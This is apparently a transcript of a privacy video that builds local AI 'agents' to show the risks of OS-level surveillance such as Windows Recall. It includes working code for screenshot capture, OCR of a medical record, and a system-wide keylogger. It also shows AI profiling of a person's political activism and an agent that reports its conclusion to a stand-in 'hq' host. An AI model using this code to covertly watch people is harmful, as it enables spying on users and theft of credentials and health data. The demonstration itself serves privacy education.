Transcript
To demonstrate this for you, we’re going to construct example AI agents and show you that what I’m saying is possible. And I’m going to use AI as well to help me build this. Are you excited yet? If you are, then make sure to stay right there. Just to establish what I’m going to be using in this demo: I’m using a single laptop with an NVIDIA GeForce RTX 3050 and lots of RAM, though we will likely never use more than 32 GB. For software, I have Ollama preloaded, as I discussed in the last video. Using Visual Studio Code, or VS Code, as my programming environment, I wrote my own AI chatbot, which I call MyAI.
Plus, I made the AI write the code that we are using as AI agents. Now, the point of this video is not to teach you programming. The bulk of you are not programmers. Just pay attention to the results of the programs I run. I’ll show you how it is made, though, so you know these are real. So let’s establish some objectives. Number one: in order to demonstrate the dangers of Windows Recall or Apple’s client-side scanning, I will show you that it is possible for some background process to examine your screen using screenshots.
Number two: in addition, an OS can do keylogging, which records everything you do on the computer via keystrokes. This is another feature now built into Windows 11. Number three: using AI, we will see if the AI can make sense of this unstructured data, in the form of screenshots and text, and see if it can make intelligent observations that it can report to another party. Number four: the premise here is that none of your raw data ever leaves your computer, but the brief analysis of what the AI finds could be sent to someone else. That’s behaving like spyware, but in a different way.
The first step to demonstrate Windows Recall is to take screenshots, since that is the mechanism described by Microsoft. This is the first Python program I will show, initially generated by the AI. There were lots of bugs, by the way, so I had to rewrite it for this demo. But because the AI built most of it, it took a very short amount of time to finish. Let me just show you how I went about this. Again, the final code I made looked quite a bit different, as I challenged the AI to change what it was doing.
Let me run this MyAI chatbot. The first thing it asks for is the model I want to use. If I leave it blank, it will use the llama3 model, which seems to generate the best code. Here are the general instructions I gave the AI: Write Python code for a program that takes continuous screenshots every 5 seconds. Then, if the screen changes substantially, meaning the content displayed is significantly different, save the image; otherwise don’t save. Save the screenshots to my VS Code test screenshots folder under my home documents directory. Measure whether the screen has changed significantly by doing a comparison with the last saved image.
For example, if the difference in the image is more than 20%, then save the image. This threshold is arbitrary, by the way. We just don’t want to waste space with duplicate images if your computer is idle; we only want to see changing screens. Now I give MyAI the instruction to write the code, as you see here. By the way, MyAI saves the queries into my queries folder so I can look back and see what it generated. This makes it easy to see the history and cut and paste it into VS Code. In real life, the model made several errors and I had to prompt it several times to change the program.
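To give you an idea of the shape of the final result, here is a minimal sketch of the screenshot-capture logic. This is my reconstruction, not the exact AI-generated code from the video; the folder path, the pixel-difference measure, and the threshold value are illustrative.

```python
# Minimal sketch of the screenshot capturer, assuming Pillow is installed.
# On Linux, ImageGrab requires X11; a Wayland desktop would need another tool.
import os
import time
from PIL import ImageGrab, ImageChops

SAVE_DIR = os.path.expanduser("~/Documents/vscode-test/screenshots")  # illustrative path
THRESHOLD = 0.20   # save when more than 20% of pixels changed (arbitrary, as noted)
INTERVAL = 5       # seconds between captures

os.makedirs(SAVE_DIR, exist_ok=True)
last_saved = None

while True:
    shot = ImageGrab.grab().convert("L")   # grayscale makes the comparison simple
    if last_saved is None:
        changed = 1.0                      # always save the first capture
    else:
        diff = ImageChops.difference(shot, last_saved)
        # fraction of pixels that differ noticeably from the last saved image
        changed = sum(1 for p in diff.getdata() if p > 30) / (shot.width * shot.height)
    if changed > THRESHOLD:
        name = time.strftime("%Y%m%d-%H%M%S") + ".png"  # timestamp filename, as in the demo
        shot.save(os.path.join(SAVE_DIR, name))
        last_saved = shot
    time.sleep(INTERVAL)
```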
This query log makes it easy for me to cut and paste the code directly into VS Code, as you can see here. Let me just hit the execute button in VS Code. Then, flipping through the important images for our demo, I just have to make sure that I allow 5 seconds before I flip. This should have been captured now, and I can stop this program. Okay, if you look at my screenshots folder here, it kept a bunch of screenshots. To save time, I’m going to rename the important ones and move them to my images folder so I can easily find them.
I’m going to prepend the name “screenshot” to them so we can recognize them. Again, they’re the same images generated by this program; I’m just renaming them since the original images use a timestamp for a name, and that’s hard to type. But I want to make clear how these were generated. So some of these are the screenshot images I specifically want to use. Now, in this task, one of the images needs to be pre-processed. This may not be necessary depending on the AI model used, but the model I have available, which is LLaVA, is not really able to do exact OCR, or optical character recognition, on images.
So to do that, I’m going to write another program. This program will take an image as input, then, using OCR, it will extract the text content it can read on the screen. OCR is a type of AI, and it’s very small. Fortunately, there’s already a pre-written program called Tesseract from Google which does OCR. All I have to do is integrate it into my Python code, as I did here. I didn’t have to use AI to generate this since it’s so simple. The general purpose of this program is to take any image as input, and the output will be a text file with the results of the OCR scan.
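A minimal sketch of that OCR step, assuming the pytesseract wrapper around Google’s Tesseract engine (the video doesn’t specify how Tesseract was integrated, so that choice is an assumption, and the filename is illustrative):

```python
# Minimal OCR sketch using pytesseract (assumed wrapper for Tesseract).
import sys
import pytesseract
from PIL import Image

image_path = sys.argv[1]              # e.g. screenshot-nurse.png (illustrative name)
text = pytesseract.image_to_string(Image.open(image_path))

out_path = image_path + ".OCR.txt"    # same name as the input, ending in OCR.txt
with open(out_path, "w") as f:
    f.write(text)
print(f"OCR result written to {out_path}")
```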
The specific screenshot I’m concerned about is the medical record, which has some pretty private data on it. Let’s see if my OCR program can extract the contents. I’m going to run this program, myocr.py, and as input I will use screenshot-nurse.png. Okay, that ran, and if we look at my logs folder, it shows the generated result, which has the same name as the original file and ends with OCR.txt. Now, if we examine this file, it shows that the text has been extracted from the image and is now in this text file.
So this OCR.txt file will be another input to our AI later on. Next is the scariest concept of all, and it is quite easy to build and demonstrate. A little program can run in the background to trap every keystroke you make and keep it in a file. The significance of this is that if you’re using some messaging app with encryption, then that encryption is pointless, since the keylogger has a record of your text before encryption. Once again, I used MyAI to write the Python code for me, and this one I did not have to modify.
I just had to take it as is and run it. I put this in VS Code. Now, let’s run it. From here on, anything I type will be captured by this keylogging program, mykeylogger.py. For this demo, I’m just going to type in a BraxMe chat screen, which we can presume to be a private conversation, and we will try to capture private content here. Let me type this: my banking username is BraxTV and my password is pass, and so on. By the way, any random text I type will end up in the keylogging program.
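For reference, a working keylogger can be only a dozen lines. Here is a minimal sketch using the pynput library; that library choice is my assumption, since the video doesn’t say what the AI actually generated.

```python
# Minimal keylogger sketch using pynput (assumed library choice).
from pynput import keyboard

LOG_FILE = "keylog.txt"  # output file name, matching the demo

def on_press(key):
    # Append every keystroke to the log: printable keys log their character,
    # special keys (Enter, Shift, ...) log their name in brackets.
    with open(LOG_FILE, "a") as f:
        try:
            f.write(key.char or "")
        except AttributeError:
            f.write(f"[{key.name}]")

with keyboard.Listener(on_press=on_press) as listener:
    listener.join()  # run indefinitely, capturing keystrokes system-wide
```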
Now, let’s check the results. As you can see here, the program created a log of the text called keylog.txt, and you can see it captured the keystrokes in the background. So once again, this keylog file can be input for the AI later on; it could, for example, be used to extract a password. I don’t have to tell you how scary it is if a hacker can read this file, and the new threat is that an AI could read it too. The next demonstration is a Python program that looks at the screenshot images we made previously, and we’ll see if the AI can understand what’s in the photo.
My MyAI chatbot has some custom features. If it knows I’m using LLaVA as my model, it will ask me for the image file name. LLaVA is a multimodal AI; that means it can accept both text and images as input. We’re going to try several things here. First, we will test the bare screenshot we named screenshot-nature.png. So I’ll give that to the AI. Then we’ll ask the AI, what do you see here? And here’s the response: a pretty nice and benign response to a scene that’s very natural. Now, let me load this image I showed you earlier.
This one I named screenshot-julysmart.png. Again, let’s ask the AI what it sees. And here’s the response. This demonstrates the ability of the AI to understand the context of the image. Now, let me change the approach. Instead of just having it describe the image, let me see if the AI can form an opinion. Loading the same image, I will now ask if this person is a political activist. And here you see a more specific response, confirming that we are looking at a political activist. This demonstrates that the AI can not only see context, but can draw a conclusion that could be revealing to another party interested in particular kinds of people.
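To show how little code such a query takes, here is a minimal sketch of asking LLaVA about an image through the ollama Python package. MyAI’s actual code differs; the filename and prompt here are illustrative.

```python
# Minimal sketch of a multimodal query to LLaVA via the local Ollama server.
import ollama

response = ollama.chat(
    model="llava",
    messages=[{
        "role": "user",
        "content": "Is this person a political activist?",
        "images": ["screenshot-julysmart.png"],   # illustrative filename
    }],
)
print(response["message"]["content"])  # the model's conclusion about the image
```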
Now, the analysis of each image is automatically saved to a file by my MyAI program, so you can see the description of each photo that I process; it is in my logs folder. This is a similar concept to Apple’s NeuralHash, where their mediaanalysisd program examines photos, except Apple could encrypt the result. The same kind of analysis can be done by Windows Recall. In practice, this kind of program would generate an accompanying text file with a description of every image or screenshot captured. In the Windows Recall description, Microsoft covered all the bases by capturing data in text using keyloggers, possibly OCR, as well as image processing, as I just showed.
But if the image contains text, we can just feed the text directly into the AI and see if the AI can evaluate it and tell us what some of this captured information is. One possibility is that the captured text comes from keylogging and contains personally identifiable information, or PII. If the AI can read it and assess it, then it could make a general conclusion about all the content it has seen. So, though we used the keylogging example to show how private things you type can be recorded, let’s use the more complex document, which is the medical record we ran OCR on.
This was a two-step process, as you may recall. The medical information was captured by a screenshot, then an OCR program read that content and created the text file automatically. Now I will have the AI read that text file, and we will ask it questions. Again, I’m going to run MyAI, but I will select a model version that allows me to supply a text file as context, which I call llama3-contextfile. The OCR file is named screenshot-nurse.png.OCR.txt, which we will supply as input. Then I ask the first question: who’s the patient here? And there’s a response. When was this patient seen? And there’s a response. Is this person healthy? And there’s a response.
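Under the hood, the context-file trick can be as simple as pasting the OCR output into the prompt. A minimal sketch, again assuming the ollama package; the prompt framing is my assumption about how a context mode like MyAI’s could work:

```python
# Minimal sketch: feed captured OCR text to llama3 as context, then ask a question.
import ollama

with open("screenshot-nurse.png.OCR.txt") as f:   # illustrative filename
    context = f.read()

question = "Who is the patient here?"
prompt = f"Use the following captured text to answer.\n\n{context}\n\nQuestion: {question}"

response = ollama.chat(model="llama3",
                       messages=[{"role": "user", "content": prompt}])
print(response["message"]["content"])
```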
In this example, again, we’re asking the AI to draw observations from the unstructured data it receives. As you can see, depending on the question, some really private information can be extracted. So what have we learned here? What I’ve demonstrated looks like fun, but unfortunately it’s not some game. Windows Recall, which Microsoft supposedly recalled, works similarly to what I described here. Apple’s client-side scanning, which occurs in the mediaanalysisd module, evaluates photos and creates a description in what they call a NeuralHash. This is very similar to what I demonstrated being done by the multimodal model LLaVA.
Though I show it here in a very rudimentary example, this is a proof of concept: an AI agent implementation like the one I show here is trivial to build. The premise is that the data never leaves the device, but the AI can be the tool that observes what happens on the device, which can then be used to deliver information to a government or to profile you. It’s a way to evade and hide privacy concerns. The main issue is that hidden agents like this can exist when the AI model operates invisibly inside an operating system like Windows, macOS, iOS, or Android.
The countermeasure to all this is to concern yourself with what operating system you are using on both your computers and phones. If you’re using a Linux OS, as I am in this demo, or if your phone is running an open source OS like AOSP, which is used on the Google phones, then there would be no hidden AI agents. That’s the problem with proprietary operating systems: you never know what they’re doing in the background. Understand that the OS does not need to move your data around. All it needs to do is pass a conclusion to HQ.
So someone could ask, find some right-wing political activist at this location, and an AI could do the finding and report “found.” What I refer to as AI agents are basically just little programs that directly interact with the AI model. They either provide input to the model or query its output and do something else, like send a message. Some agents are already in operation, like Windows Recall or the macOS mediaanalysisd module, and there could be a lot of smaller ones, as I described here. Also, in the case of Apple and Microsoft, it is clear from their explanations that a smaller local AI is able to communicate with a larger cloud-based AI to supplement its knowledge.
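To make the agent idea concrete, here is a minimal sketch of the whole loop: analyze locally, then transmit only the conclusion. The reporting endpoint is hypothetical, and this is a proof-of-concept shape, not any vendor’s actual implementation.

```python
# Minimal agent sketch: local analysis, remote one-bit report (hypothetical endpoint).
import ollama
import urllib.request

verdict = ollama.chat(
    model="llava",
    messages=[{
        "role": "user",
        "content": "Answer yes or no: is this a political activist?",
        "images": ["latest-screenshot.png"],   # illustrative filename
    }],
)["message"]["content"]

if "yes" in verdict.lower():
    # The raw screenshot never leaves the computer; only the tiny conclusion does.
    urllib.request.urlopen("https://hq.example.com/report?found=1")  # hypothetical URL
```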
This is where an external hook can exist from local AI data to cloud AI data. We’ll get into more of this later with more specific explanations. What I’ve done here is expose something that, so far, no one is fully describing: the risks of embedded AIs. AI can be made safe in the correct environment, which I’m teaching you about. But if you just accept what is being provided to you, then it can be dangerous, especially if it’s embedded into the OS. Folks, as we switch to an AI-driven world, what I’ve been teaching about privacy seems to have even more importance.
The next level of danger is when the AI knows you personally. Fortunately, we can stop that with products I’ve already made, products that support this channel. We have the Google phones running AOSP that do not pass information to Big Tech and are immune to such things as embedded AI and AI agents. We have the Brax Virtual Phone product, which gives you inexpensive phone numbers you can use to keep your identity away from Big Tech and future AI intelligence. We have BraxMail, which keeps your identity private so it cannot be harvested for AI data later on.
We have BytzVPN and BraxRouter, which hide your IP address, a major identifier that can be harvested to identify your past actions. All these products can be found on my social media platform, BraxMe. This platform is a place for people to discuss privacy, and over 100,000 people are there talking about privacy issues daily. There’s a store on there with all these products. Come visit us, chat with the community, and support what we do. Thank you for watching, and see you next time.